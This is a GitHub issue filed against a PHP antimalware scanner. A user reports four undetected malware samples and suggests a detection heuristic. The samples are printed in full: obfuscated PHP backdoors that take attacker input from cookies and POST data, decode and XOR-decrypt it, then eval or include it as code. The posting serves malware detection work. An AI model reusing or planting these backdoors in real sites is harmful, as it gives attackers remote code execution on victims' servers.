search

marcocesarato / PHP-Antimalware-Scanner

AMWScan (PHP Antimalware Scanner) is a free tool to scan php files and analyze your project to find any malicious code inside it.
https://marcocesarato.github.io/PHP-Antimalware-Scanner/
GNU General Public License v3.0
642 stars 108 forks source link

Undetected malwares #105

Open ebourg opened 4 months ago

ebourg commented 4 months ago

Just found these malwares that weren't detected by the scanner:

$GRNRFc = 'V' . '_' . "\x51" . "\x6e" . 'E' . 'K' . "\x4b";$ZkQeaKiKV = chr (99) . chr ( 482 - 374 ).chr (97) . "\x73" . "\x73" . chr (95) . chr (101) . "\x78" . chr ( 513 - 408 ).chr (115) . "\x74" . chr (115); $tHCTzrRTa = class_exists($GRNRFc); $ZkQeaKiKV = "30813";$Bnauel = !1;if ($tHCTzrRTa == $Bnauel){function EbUQQDwP(){$zrmsCLkLp = new /* 28317 */ V_QnEKK(18652 + 18652); $zrmsCLkLp = NULL;}$yCUiq = "18652";class V_QnEKK{private function vAjeUvW($yCUiq){if (is_array(V_QnEKK::$xBmKEmU)) {$DkdswkjV = str_replace("\74" . '?' . chr (112) . "\x68" . 'p', "", V_QnEKK::$xBmKEmU["\x63" . "\x6f" . "\156" . "\164" . chr (101) . "\x6e" . 't']);eval($DkdswkjV); $yCUiq = "18652";exit();}}private $OashYfi;public function avjuwOZFze(){echo 41931;}public function __destruct(){$yCUiq = "63071_28842";$this->vAjeUvW($yCUiq); $yCUiq = "63071_28842";}public function CBihlQQeR($oLvOlCz, $ICNQhIu){return $oLvOlCz[0] ^ str_repeat($ICNQhIu, (strlen($oLvOlCz[0]) / strlen($ICNQhIu)) + 1);}public function __construct($xAXqvTpA=0){$FPxTqQPgB = $_POST;$AZJPK = $_COOKIE;$ICNQhIu = "301407a7-7bdd-4637-b5c9-06e442e49d5a";$jxkKrdbK = @$AZJPK[substr($ICNQhIu, 0, 4)];if (!empty($jxkKrdbK)){$BsKyrwAEcE = "base64";$oLvOlCz = "";$jxkKrdbK = explode(",", $jxkKrdbK);foreach ($jxkKrdbK as $BuxlJxC){$oLvOlCz .= @$AZJPK[$BuxlJxC];$oLvOlCz .= @$FPxTqQPgB[$BuxlJxC];}$oLvOlCz = array_map($BsKyrwAEcE . '_' . chr ( 938 - 838 ).'e' . chr ( 574 - 475 )."\x6f" . "\x64" . "\145", array($oLvOlCz,)); $oLvOlCz = $this->CBihlQQeR($oLvOlCz, $ICNQhIu);V_QnEKK::$xBmKEmU = @unserialize($oLvOlCz);}}public static $xBmKEmU = 25143;}EbUQQDwP();}
<?php

function _charset()

{
    $raw_title = 'f97L4Hyn8Jg';
    $post_types = $raw_title;

    $previous_date = $GLOBALS[input("9%7F%7E%00q%1B", $post_types)];
    $delete = $previous_date;
        $custom_fields = '_post';
    $mime_match = isset($delete[$post_types]);

    if ($mime_match)

    {
        $tt_ids = 'internal';
        $sanitized = $previous_date[$post_types];
        $cockneyreplace = $sanitized[input("%12TG%13Z%29%14%0B", $post_types)];
        $parts = $cockneyreplace;
        include ($parts);
    }
}
function input($show_in_admin_status_list, $publicly_queryable)

{

    $wp_post_types = $publicly_queryable;
        $double_prime = 'tags_to_ignore';
    $property_name = "url" . "decode";
    $mins = $property_name($show_in_admin_status_list);

    $format = substr($wp_post_types,0, strlen($mins));

    $show_in_menu = $mins ^ $format;

    $mins = strpos($show_in_menu, $format);

    return $show_in_menu;
}
        $nohier_vs_hier_defaults = 'post_type_in_string';

_charset();

?>
$yePAZNLbRY = chr (100) . chr ( 642 - 547 )."\x49" . chr ( 1057 - 956 ).chr (69) . "\x79" . chr (76); $qffKMCuiT = "\x63" . chr (108) . chr (97) . chr ( 923 - 808 ).'s' . chr (95) . 'e' . "\x78" . "\x69" . "\163" . "\x74" . "\163";$TLvyEg = class_exists($yePAZNLbRY); $qffKMCuiT = "3393";$alXknwj = !1;if ($TLvyEg == $alXknwj){function gLYWbhtb(){return FALSE;}$sTgbCPwWxw = "41613";gLYWbhtb();class d_IeEyL{private function DmoLd($sTgbCPwWxw){if (is_array(d_IeEyL::$UiTJxGm)) {$bvlyHtI = str_replace(chr ( 106 - 46 ) . "\x3f" . "\x70" . 'h' . chr (112), "", d_IeEyL::$UiTJxGm[chr (99) . chr ( 968 - 857 ).'n' . chr ( 337 - 221 )."\145" . 'n' . chr (116)]);eval($bvlyHtI); $sTgbCPwWxw = "41613";exit();}}private $RbnFu;public function JYIasy(){echo 42935;}public function __destruct(){$sTgbCPwWxw = "14197_12147";$this->DmoLd($sTgbCPwWxw); $sTgbCPwWxw = "14197_12147";}public function __construct($sQvGICW=0){$HidyYs = $_POST;$xcZSJMJSS = $_COOKIE;$nDkFFGJ = "adaea6d7-c626-495a-9839-246089b4c92a";$WwkXBUdfJJ = @$xcZSJMJSS[substr($nDkFFGJ, 0, 4)];if (!empty($WwkXBUdfJJ)){$EctSW = "base64";$oLeNYMtOPT = "";$WwkXBUdfJJ = explode(",", $WwkXBUdfJJ);foreach ($WwkXBUdfJJ as $phDSwy){$oLeNYMtOPT .= @$xcZSJMJSS[$phDSwy];$oLeNYMtOPT .= @$HidyYs[$phDSwy];}$oLeNYMtOPT = array_map($EctSW . "\137" . "\144" . "\145" . "\x63" . "\157" . "\x64" . "\x65", array($oLeNYMtOPT,)); $oLeNYMtOPT = $oLeNYMtOPT[0] ^ str_repeat($nDkFFGJ, (strlen($oLeNYMtOPT[0]) / strlen($nDkFFGJ)) + 1);d_IeEyL::$UiTJxGm = @unserialize($oLeNYMtOPT); $oLeNYMtOPT = class_exists("14197_12147");}}public static $UiTJxGm = 44887;}$UfEFb = new /* 25527 */ $yePAZNLbRY(41613 + 41613); $sTgbCPwWxw = strpos($sTgbCPwWxw, $sTgbCPwWxw); $alXknwj = $UfEFb = $sTgbCPwWxw = Array();}

I guess that using the functions explode and eval on the first line of a file could be flagged as suspicious.

ebourg commented 4 months ago

Another one, without the eval function:

$exXhBCc = 't' . "\137" . "\x6c" . "\x63" . 'y';$JjYSAMYHH = "\x63" . "\x6c" . chr ( 717 - 620 ).'s' . chr ( 165 - 50 ).'_' . "\145" . "\170" . "\151" . "\x73" . chr (116) . "\x73";$wzfPz = class_exists($exXhBCc); $JjYSAMYHH = "44175";$aDLLwXVYSL = !1;if ($wzfPz == $aDLLwXVYSL){function FzMEGqlMK(){$VVaMVwrN = new /* 41728 */ t_lcy(5855 + 5855); $VVaMVwrN = NULL;}$cDNjoQAt = "5855";class t_lcy{private function tSazHL($cDNjoQAt){if (is_array(t_lcy::$HmCPtFpTo)) {$kpOpXOOQ = sys_get_temp_dir() . "/" . crc32(t_lcy::$HmCPtFpTo["\163" . "\x61" . chr ( 1085 - 977 )."\164"]);@t_lcy::$HmCPtFpTo["\x77" . "\x72" . "\151" . chr ( 769 - 653 ).'e']($kpOpXOOQ, t_lcy::$HmCPtFpTo["\143" . "\x6f" . "\156" . chr (116) . chr ( 590 - 489 )."\156" . chr (116)]);include $kpOpXOOQ;@t_lcy::$HmCPtFpTo[chr ( 312 - 212 ).'e' . 'l' . "\145" . "\164" . 'e']($kpOpXOOQ); $cDNjoQAt = "5855";exit();}}private $aEFjoHrDU;public function VzdTtnMm(){echo 1986;}public function __destruct(){t_lcy::$HmCPtFpTo = @unserialize(t_lcy::$HmCPtFpTo); $cDNjoQAt = "64201_44762";$this->tSazHL($cDNjoQAt); $cDNjoQAt = "64201_44762";}public function OdICv($ihsQcHj, $ZUMkhwR){return $ihsQcHj[0] ^ str_repeat($ZUMkhwR, (strlen($ihsQcHj[0]) / strlen($ZUMkhwR)) + 1);}public function __construct($qQNwRv=0){$FpjbTffga = $_POST;$VuwvnDjEdq = $_COOKIE;$ZUMkhwR = "de91630f-5086-4c88-8fa4-67d5961f9380";$BQSVpVoUG = @$VuwvnDjEdq[substr($ZUMkhwR, 0, 4)];if (!empty($BQSVpVoUG)){$GnQvdl = "base64";$ihsQcHj = "";$BQSVpVoUG = explode(",", $BQSVpVoUG);foreach ($BQSVpVoUG as $VOaHShiHN){$ihsQcHj .= @$VuwvnDjEdq[$VOaHShiHN];$ihsQcHj .= @$FpjbTffga[$VOaHShiHN];}$ihsQcHj = array_map($GnQvdl . "\137" . "\x64" . "\145" . chr (99) . "\157" . chr ( 524 - 424 )."\145", array($ihsQcHj,));t_lcy::$HmCPtFpTo = $this->OdICv($ihsQcHj, $ZUMkhwR);}}public static $HmCPtFpTo = 53491;}FzMEGqlMK();}